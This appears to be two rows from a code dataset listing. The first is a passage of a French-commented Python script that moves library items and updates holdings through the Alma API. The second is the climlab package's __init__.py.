        # the guard above only requires 2 columns. TODO confirm input format.
        if row[3] is None or row[3] == '':
            log_module.error("{} :: Echec :: pas de localisation fournie".format(barcode))
            report.write("{}\tErreur Fichier\tPas de localisation fournie\n".format(barcode))
            continue
        # log_module.info("{} :: Main :: Début du traitement".format(barcode))
        # Transform location label in location code
        if row[3] not in locations_dict:
            log_module.error("{} :: Echec :: La localisation {} est inconnue dans Alma".format(barcode,row[3]))
            report.write("{}\tErreur Fichier\tLa localisation '{}' est inconnue dans Alma\n".format(barcode,row[3]))
            continue
        location_code = locations_dict[row[3]]
        log_module.debug("{} :: Succes :: A affecter dans la localisation {}".format(barcode,location_code))
        # Get the item data with the barcode
        status, response = alma_api.get_item_with_barcode(barcode)
        if status == 'Error':
            log_module.error("{} :: Echec :: {}".format(barcode,response))
            report.write("{}\tErreur Retrouve Exemplaire\t{}\n".format(barcode,response))
            continue
        # Change location and remove holdings infos
        item = ET.fromstring(response)
        mms_id, old_holding_id,item_id = item_change_location(item,location_code, call)
        # log_module.debug("{} :: {} - {} - {}".format(barcode,mms_id,old_holding_id,item_id))
        # Update item in Alma
        set_status, set_response = alma_api.set_item(mms_id, old_holding_id,item_id,ET.tostring(item))
        log_module.debug(set_response)
        if set_status == 'Error':
            log_module.error("{} :: Echec :: {}".format(barcode,set_response))
            report.write("{}\tErreur Mise à jour Exemplaire\t{}\n".format(barcode,set_response))
            continue
        # Alma may have reattached the item to a different holding; remember it
        # so the 852 field can be rewritten in the second pass below.
        changed_item = ET.fromstring(set_response)
        new_holding_id = changed_item.find(".//holding_id").text
        # NOTE(review): this overwrites any previous entry for the record, so
        # only the most recent location/call pair is remembered per mms_id.
        processed_record_dict[mms_id] = {
            location_code: call
        }
        if new_holding_id not in toprocess_holding_dict:
            toprocess_holding_dict[new_holding_id] = {
                'call' : call,
                'barcode': barcode
            }
        log_module.info("{} :: Succes :: L'exemplaire est maintenant rattaché à la Holding {}".format(barcode,new_holding_id))
log_module.info("FIN DU DEPLACEMENT DES EXEMPLAIRES")
### Update new holding sequence
# ############################
# Second pass: rewrite the 852 field of every holding touched by the item pass.
log_module.info("DEBUT DE LA MODIFICATION DES HOLDINGS")
for new_holding_id in toprocess_holding_dict.keys():
    call = toprocess_holding_dict[new_holding_id]['call']
    barcode = toprocess_holding_dict[new_holding_id]['barcode']
    # NOTE(review): `mms_id` is not set in this loop -- it still holds the value
    # left by the last iteration of the item loop above, so every call below
    # uses that single record id for all holdings. The record id should likely
    # be stored in toprocess_holding_dict alongside 'call'/'barcode'.
    # TODO confirm against the Alma holdings API.
    # Get the new holding record
    get_holding_status, get_holding_response = alma_api.get_holding(mms_id, new_holding_id)
    if get_holding_status == 'Error':
        log_module.error("{} :: Echec :: {}".format(new_holding_id,get_holding_response))
        report.write("{}\tErreur Retrouve Holding\t{}\n".format(barcode,get_holding_response))
        continue
    # Blank the 852 first indicator and set $h to the new call number.
    changed_holding = update_holding_data(get_holding_response,call)
    # Write the updated holding back to Alma
    set_holding_status, set_holding_response = alma_api.set_holding(mms_id, new_holding_id,changed_holding)
    if set_holding_status == 'Error':
        log_module.error("{} :: Echec :: {}".format(new_holding_id,set_holding_response))
        report.write("{}\tErreur Ecriture Holding\t{}\n".format(barcode,set_holding_response))
        continue
    log_module.debug(set_holding_response)
    log_module.info("{} :: Succes :: La holding a été mise à jour".format(new_holding_id))
# Bug fix: the original read `report.close` / `multi_call_report.close`,
# which only references the bound method and never closes the files.
report.close()
multi_call_report.close()
log_module.info("FIN DU TRAITEMENT")
|
5,699 | 8251a9c798b3cdc2f374d0a0406ccfaa11b7c5e3 | __version__ = '0.2.11'
# This list defines all the modules that will be loaded if a user invokes
# from climLab import *
# totally out of date!
#__all__ = ["constants", "thermo", "orbital_table",
# "long_orbital_table", "insolation", "ebm",
# "column", "convadj"]
#from climlab import radiation
# this should ensure that we can still import constants.py as climlab.constants
from climlab.utils import constants
from climlab.utils import thermo, legendre
# some more useful shortcuts
#from climlab.model import ebm, column
from climlab.model.column import GreyRadiationModel, RadiativeConvectiveModel, BandRCModel
from climlab.model.ebm import EBM, EBM_annual, EBM_seasonal
from climlab.domain import domain
from climlab.domain.field import Field, global_mean
from climlab.domain.axis import Axis
from climlab.process.process import Process, process_like, get_axes
from climlab.process.time_dependent_process import TimeDependentProcess
from climlab.process.implicit import ImplicitProcess
from climlab.process.diagnostic import DiagnosticProcess
from climlab.process.energy_budget import EnergyBudget
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.